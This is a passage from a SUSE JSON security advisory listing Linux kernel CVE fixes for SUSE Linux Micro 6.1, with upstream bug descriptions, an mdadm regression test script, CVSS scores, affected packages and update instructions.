"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53782"
},
{
"cve": "CVE-2023-53784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: bridge: dw_hdmi: fix connector access for scdc\n\nCommit 5d844091f237 (\"drm/scdc-helper: Pimp SCDC debugs\") changed the scdc\ninterface to pick up an i2c adapter from a connector instead. However, in\nthe case of dw-hdmi, the wrong connector was being used to pass i2c adapter\ninformation, since dw-hdmi\u0027s embedded connector structure is only populated\nwhen the bridge attachment callback explicitly asks for it.\n\ndrm-meson is handling connector creation, so this won\u0027t happen, leading to\na NULL pointer dereference.\n\nFix it by having scdc functions access dw-hdmi\u0027s current connector pointer\ninstead, which is assigned during the bridge enablement stage.\n\n[narmstrong: moved Fixes tag before first S-o-b and added Reported-by tag]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53784",
"url": "https://www.suse.com/security/cve/CVE-2023-53784"
},
{
"category": "external",
"summary": "SUSE Bug 1254765 for CVE-2023-53784",
"url": "https://bugzilla.suse.com/1254765"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53784"
},
{
"cve": "CVE-2023-53785",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53785"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7921: don\u0027t assume adequate headroom for SDIO headers\n\nmt7921_usb_sdio_tx_prepare_skb() calls mt7921_usb_sdio_write_txwi() and\nmt7921_skb_add_usb_sdio_hdr(), both of which blindly assume that\nadequate headroom will be available in the passed skb. This assumption\ntypically is satisfied when the skb was allocated in the net core for\ntransmission via the mt7921 netdev (although even that is only an\noptimization and is not strictly guaranteed), but the assumption is\nsometimes not satisfied when the skb originated in the receive path of\nanother netdev and was passed through to the mt7921, such as by the\nbridge layer. Blindly prepending bytes to an skb is always wrong.\n\nThis commit introduces a call to skb_cow_head() before the call to\nmt7921_usb_sdio_write_txwi() in mt7921_usb_sdio_tx_prepare_skb() to\nensure that at least MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE bytes can be\npushed onto the skb.\n\nWithout this fix, I can trivially cause kernel panics by bridging an\nMT7921AU-based USB 802.11ax interface with an Ethernet interface on an\nIntel Atom-based x86 system using its onboard RTL8169 PCI Ethernet\nadapter and also on an ARM-based Raspberry Pi 1 using its onboard\nSMSC9512 USB Ethernet adapter. Note that the panics do not occur in\nevery system configuration, as they occur only if the receiving netdev\nleaves less headroom in its received skbs than the mt7921 needs for its\nSDIO headers.\n\nHere is an example stack trace of this panic on Raspberry Pi OS Lite\n2023-02-21 running kernel 6.1.24+ [1]:\n\n skb_panic from skb_push+0x44/0x48\n skb_push from mt7921_usb_sdio_tx_prepare_skb+0xd4/0x190 [mt7921_common]\n mt7921_usb_sdio_tx_prepare_skb [mt7921_common] from mt76u_tx_queue_skb+0x94/0x1d0 [mt76_usb]\n mt76u_tx_queue_skb [mt76_usb] from __mt76_tx_queue_skb+0x4c/0xc8 [mt76]\n __mt76_tx_queue_skb [mt76] from mt76_txq_schedule.part.0+0x13c/0x398 [mt76]\n mt76_txq_schedule.part.0 [mt76] from mt76_txq_schedule_all+0x24/0x30 [mt76]\n mt76_txq_schedule_all [mt76] from mt7921_tx_worker+0x58/0xf4 [mt7921_common]\n mt7921_tx_worker [mt7921_common] from __mt76_worker_fn+0x9c/0xec [mt76]\n __mt76_worker_fn [mt76] from kthread+0xbc/0xe0\n kthread from ret_from_fork+0x14/0x34\n\nAfter this fix, bridging the mt7921 interface works fine on both of my\npreviously problematic systems.\n\n[1] https://github.com/raspberrypi/firmware/tree/5c276f55a4b21345cd4d6200a504ee991851ff7a",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53785",
"url": "https://www.suse.com/security/cve/CVE-2023-53785"
},
{
"category": "external",
"summary": "SUSE Bug 1254918 for CVE-2023-53785",
"url": "https://bugzilla.suse.com/1254918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53785"
},
{
"cve": "CVE-2023-53787",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53787"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: da9063: fix null pointer deref with partial DT config\n\nWhen some of the da9063 regulators do not have corresponding DT nodes\na null pointer dereference occurs on boot because such regulators have\nno init_data causing the pointers calculated in\nda9063_check_xvp_constraints() to be invalid.\n\nDo not dereference them in this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53787",
"url": "https://www.suse.com/security/cve/CVE-2023-53787"
},
{
"category": "external",
"summary": "SUSE Bug 1254750 for CVE-2023-53787",
"url": "https://bugzilla.suse.com/1254750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53787"
},
{
"cve": "CVE-2023-53791",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53791"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix warning for holder mismatch from export_rdev()\n\nCommit a1d767191096 (\"md: use mddev-\u003eexternal to select holder in\nexport_rdev()\") fix the problem that \u0027claim_rdev\u0027 is used for\nblkdev_get_by_dev() while \u0027rdev\u0027 is used for blkdev_put().\n\nHowever, if mddev-\u003eexternal is changed from 0 to 1, then \u0027rdev\u0027 is used\nfor blkdev_get_by_dev() while \u0027claim_rdev\u0027 is used for blkdev_put(). And\nthis problem can be reporduced reliably by following:\n\nNew file: mdadm/tests/23rdev-lifetime\n\ndevname=${dev0##*/}\ndevt=`cat /sys/block/$devname/dev`\npid=\"\"\nruntime=2\n\nclean_up_test() {\n pill -9 $pid\n echo clear \u003e /sys/block/md0/md/array_state\n}\n\ntrap \u0027clean_up_test\u0027 EXIT\n\nadd_by_sysfs() {\n while true; do\n echo $devt \u003e /sys/block/md0/md/new_dev\n done\n}\n\nremove_by_sysfs(){\n while true; do\n echo remove \u003e /sys/block/md0/md/dev-${devname}/state\n done\n}\n\necho md0 \u003e /sys/module/md_mod/parameters/new_array || die \"create md0 failed\"\n\nadd_by_sysfs \u0026\npid=\"$pid $!\"\n\nremove_by_sysfs \u0026\npid=\"$pid $!\"\n\nsleep $runtime\nexit 0\n\nTest cmd:\n\n./test --save-logs --logdir=/tmp/ --keep-going --dev=loop --tests=23rdev-lifetime\n\nTest result:\n\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 960 at block/bdev.c:618 blkdev_put+0x27c/0x330\nModules linked in: multipath md_mod loop\nCPU: 0 PID: 960 Comm: test Not tainted 6.5.0-rc2-00121-g01e55c376936-dirty #50\nRIP: 0010:blkdev_put+0x27c/0x330\nCall Trace:\n \u003cTASK\u003e\n export_rdev.isra.23+0x50/0xa0 [md_mod]\n mddev_unlock+0x19d/0x300 [md_mod]\n rdev_attr_store+0xec/0x190 [md_mod]\n sysfs_kf_write+0x52/0x70\n kernfs_fop_write_iter+0x19a/0x2a0\n vfs_write+0x3b5/0x770\n ksys_write+0x74/0x150\n __x64_sys_write+0x22/0x30\n do_syscall_64+0x40/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFix the problem by recording if \u0027rdev\u0027 is used as holder.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53791",
"url": "https://www.suse.com/security/cve/CVE-2023-53791"
},
{
"category": "external",
"summary": "SUSE Bug 1254742 for CVE-2023-53791",
"url": "https://bugzilla.suse.com/1254742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53791"
},
{
"cve": "CVE-2023-53792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_ctrl_secret\n\nFree dhchap_secret in nvme_ctrl_dhchap_ctrl_secret_store() before we\nreturn when nvme_auth_generate_key() returns error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
